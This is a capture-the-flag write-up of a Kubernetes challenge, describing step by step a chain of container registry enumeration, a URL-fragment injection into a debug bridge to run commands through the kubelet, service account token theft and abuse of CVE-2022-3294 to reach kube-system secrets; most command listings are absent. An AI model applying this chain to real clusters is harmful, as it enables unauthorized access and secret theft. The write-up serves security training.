Game of Pods

Challenge Description

A Kubernetes-based security challenge that requires exploiting container registry access, service account permissions, and a URL injection vulnerability to achieve privilege escalation from a limited pod environment to cluster-level access.

Table of Contents

Solution Overview

This challenge demonstrates a multi-stage Kubernetes security exploitation chain involving container registry enumeration, URL injection, and RBAC privilege escalation:

  1. Container Registry Discovery - Enumerate Azure Container Registry (ACR) repositories using the ORAS CLI tool to discover the k8s-debug-bridge service

  2. Image Analysis - Extract and analyze container images to discover source code revealing a URL injection vulnerability in the debug bridge service

  3. URL Injection - Exploit URL parsing vulnerability to inject commands through the kubelet API and extract service account tokens

  4. Service Account Token Theft - Abuse create secrets permission to generate a service account token for the privileged k8s-debug-bridge service account

  5. Node Proxy Exploitation (CVE-2022-3294) - Leverage node status modification and proxy capabilities to redirect API requests and access kube-system secrets

Key Vulnerability: URL injection in the k8s-debug-bridge service combined with RBAC misconfigurations allowed escalation from limited pod access to cluster-admin level privileges through CVE-2022-3294.

Initial Analysis

Kubernetes Permission Enumeration

Since the challenge mentioned Kubernetes, we started by checking what permissions we have:

Permissions were limited. Only one pod existed:

Let's inspect the pod configuration in detail:

Output:

Key findings:

  • Pod is using service account: test-sa

  • Pod is running the image: hustlehub.azurecr.io/test:latest

  • Pod is deployed in the staging namespace

  • We are likely executing inside this pod

Security Note: The pod is pulled from Azure Container Registry (ACR), which may contain additional repositories accessible with the same credentials.

Container Registry Discovery

Let's check for any built-in tools to interact with the container registry:

The oras binary stood out - its timestamp differed from the base image, suggesting it was intentionally added for this challenge.

Dumping Container Images

A quick search revealed that ORAS is the OCI Registry As Storagearrow-up-right project:

Step 1: List available repositories

Output:

We discovered two repositories:

  • test - Likely the container we're currently running in

  • k8s-debug-bridge - An interesting service that might contain valuable information

Step 2: Attempt to pull the test image

Analysis:

The pull operation returned an empty folder. This failed because:

  • test:latest is a container image, not a file-based OCI artifact

  • ORAS only writes layers to disk if they have filenames (org.opencontainers.image.title)

  • Container image layers are filesystem tarballs, not named files

  • ORAS skipped extracting them, leaving the directory empty

The error message suggested using oras copy instead.

Step 3: Copy the image using OCI layout

Success! We retrieved the image layers and corresponding metadata:

Step 4: Analyze the test image configuration

Examining the image configuration file reveals the build history and installed tools. The configuration confirms this is the image our current pod is running. The presence of kubectl, oras, and coredns-enum tools indicates this is a testing container that we are on.

Step 5: Extract the k8s-debug-bridge image

Now let's examine the more interesting k8s-debug-bridge repository:

Step 6: Analyze the k8s-debug-bridge configuration

Examining the image configuration reveals how the container was built. Key observations:

  • The Dockerfile copies both k8s-debug-bridge (binary) and k8s-debug-bridge.go (source code)

  • The service exposes port 8080

  • The CMD runs the compiled binary ./k8s-debug-bridge

Step 7: Extract the source code

The container includes the source code! Let's extract the last layer:

Success! We extracted both the compiled Go binary and the source code:

Security Note: Including source code in production container images is a significant security risk, as it makes vulnerability analysis much easier for attackers.


Main Exploitation

Debug Bridge Source Code Analysis

The k8s-debug-bridge is a debug proxy service for Kubernetes that forwards requests for logs or checkpoints from clients to the kubelet API running on cluster nodes.

Exposed Endpoints:

Endpoint 1: /logs

Purpose: Retrieves container logs from the Kubernetes kubelet API.

How it works:

  1. Accepts POST request with JSON: {"node_ip": "X.X.X.X", "pod": "name", "namespace": "ns", "container": "name"}

  2. Constructs URL: https://<node_ip>:10250/containerLogs/<namespace>/<pod>/<container>

  3. Makes GET request to kubelet with service account token

  4. Returns log data as application/octet-stream

Endpoint 2: /checkpoint

Purpose: Creates a checkpoint (snapshot) of a running container.

How it works:

  1. Accepts POST request with same JSON parameters as /logs

  2. Constructs URL: https://<node_ip>:10250/checkpoint/<namespace>/<pod>/<container>

  3. Makes POST request to kubelet

  4. Returns checkpoint data/response

Finding the k8s-debug-bridge Service

The k8s-debug-bridge service must be deployed somewhere in the cluster. Let's scan the internal subnet to locate it.

Method 1: Using nmap

Method 2: Using coredns-enum (Alternative)

Since we have coredns-enumarrow-up-right installed, we can enumerate Kubernetes services through DNS - a tool that lists service IPs, ports, and endpoints:

Discovered Services:

Name
IP
Port

app-blog-service

10.43.1.36

80

k8s-debug-bridge

10.43.1.168

80

URL Injection Vulnerability

Step 1: Test the debug bridge functionality

Let's interact with the k8s-debug-bridge to retrieve logs from app-blog-service:

The service works as expected and returns container logs, but there's nothing immediately useful.

Step 2: Analyze URL construction logic

Let's examine how the service constructs URLs:

This immediately caught my attention because req.NodeIP is user-controlled input being inserted directly into a URL string via simple string concatenation. The code then validates the constructed URL rather than validating the input components first.

Step 3: Understanding the Security Controls

Before attempting to exploit this, I mapped out the validation logic:

Key insight: All validation happens on the parsed URL, not on the raw input parameters. Since node_ip is the first parameter in the fmt.Sprintf, the validation only checks that parsedURL.Hostname() returns a valid IP, but it doesn't validate that node_ip contains only an IP.

Step 4: Exploiting URL fragments for command injection

URL fragments (everything after #) are:

  • Part of the URL string during parsing

  • Never sent to the server in HTTP requests

If we inject a # into node_ip, everything after it becomes a fragment and gets discarded by the HTTP client.

The kubelet API has a /run endpoint for command execution. Let's construct a POST request to /run to perform command execution:

The constructed URL will be:

Parsed components:

  • Host: 172.30.0.2:10250

  • Path: /run/app/app-blog/app-blog

  • Query: cmd=id

  • Fragment: :10250/containerLogs/app/app-blog/app-blogDiscarded by HTTP client

Success! We achieved command execution.

Finding app-blog source code

Performing some enumeration, we found the file main.go.

From the source code, we can assume that the app-blog web application have permission to create a secrets within the app namespace.

Service Account Token Extraction

Let's extract the service account token from the app-blog container:

Extracted token:

Decoded token payload:

This token belongs to the app service account in the app namespace.

Privilege Escalation via Secret Creation

Step 1: Enumerate service account permissions

The permission check shows no explicit permissions, but let's test secret operations:

Success! We can read secrets. Let's examine them:

Output:

The password hash is Argon2id, which is very expensivearrow-up-right to crack, so that's not the intended path.

Step 2: Abuse create secrets permission

From analyzing the app-blog source code earlier, we know the app service account can create secrets. Let's test if we can create a service account token secret for the k8s-debug-bridge service account:

Reference: HackTricks - Creating and Reading Secretsarrow-up-right

Create a service account token secret:

Step 3: Extract the k8s-debug-bridge token

The token is automatically populated by Kubernetes! Let's decode it:

Step 4: Enumerate k8s-debug-bridge permissions

Critical permissions identified:

  • nodes/proxy - Can proxy requests through nodes

  • nodes/status - Can patch node status (UPDATE verb)

  • pods - Can list pods in all namespaces

Code Execution via Nodes/Proxy

Since we have access to the nodes/proxy, we are able to execute code via the KubeletAPI. Referring to the HackTricksarrow-up-right article for more information on how to abuse this.

Lets get more information regarding the nodes

It seems like there is a node called noder.

k8s-debug-bridge service account can interact with the Kubelet API on nodes through the Kubernetes API server's proxy endpoint. This is significant because the Kubelet API allows direct interaction with pods running on nodes.

Lets try and list the pods running on the noder nodes

First, we start a kubectl proxy in the background, then use curl to send a POST request.

However we have already previously dumped the k8s-debug-bridge container, and there isnt anything useful there.

Exploiting CVE-2022-3294

We would need to perform privilege escalation from our existing service account to get access to kube-system namespace.

Trying to get code execution over coredns gave an error where id is not in $PATH. Trying out other common binaries returns the same error.

From here I was stuck for quite a while, and couldnt progress. I went to stalk osint the author and found out that he has CVE-2022-3294arrow-up-right.

Since we have access to nodes/proxy and can update nodes/status, we can exploit CVE-2022-3294:

The exploit works as follows:

  1. An authenticated user with nodes/proxy and nodes/status permissions can modify node objects

  2. By changing the node's kubelet endpoint in the status, we can redirect proxy requests

  3. When the API server tries to proxy the request through what it thinks is the kubelet, it actually connects to itself (port 6443)

  4. The API server authenticates to itself, creating a confused deputy scenario that bypasses RBAC checks

Step 1: Patch the node status to redirect to API server

Step 2: Access kube-system secrets through the node proxy

Note: You need to run both commands back-to-back, or the node status may be reset by the kubelet. You can run the bash script below to execute them sequentially.


Getting the Flag

Success! We retrieved secrets from the kube-system namespace:

Summary:

  1. URL Injection - The k8s-debug-bridge service concatenated user input into URLs before validation, allowing us to inject URL components via fragments

  2. Kubelet API Access - The URL injection gave us command execution through the kubelet API, allowing service account token extraction

  3. Secret Creation Abuse - The app service account could create secrets, including service account token secrets for other accounts

  4. RBAC Misconfiguration - The k8s-debug-bridge service account had excessive permissions (nodes/proxy + nodes/status)

  5. CVE-2022-3294 - By modifying the node's kubelet endpoint port from 10250 to 6443 (API server port), we redirect node proxy requests to the API server itself. When the API server attempts to proxy our request through the "kubelet," it actually connects and authenticates to itself. This self-authentication creates a confused deputy vulnerability where the API server processes the proxied request with elevated privileges, bypassing RBAC and granting access to cluster-admin level resources.

Flag: WIZ_CTF{k8s_is_one_big_proxy}

Last updated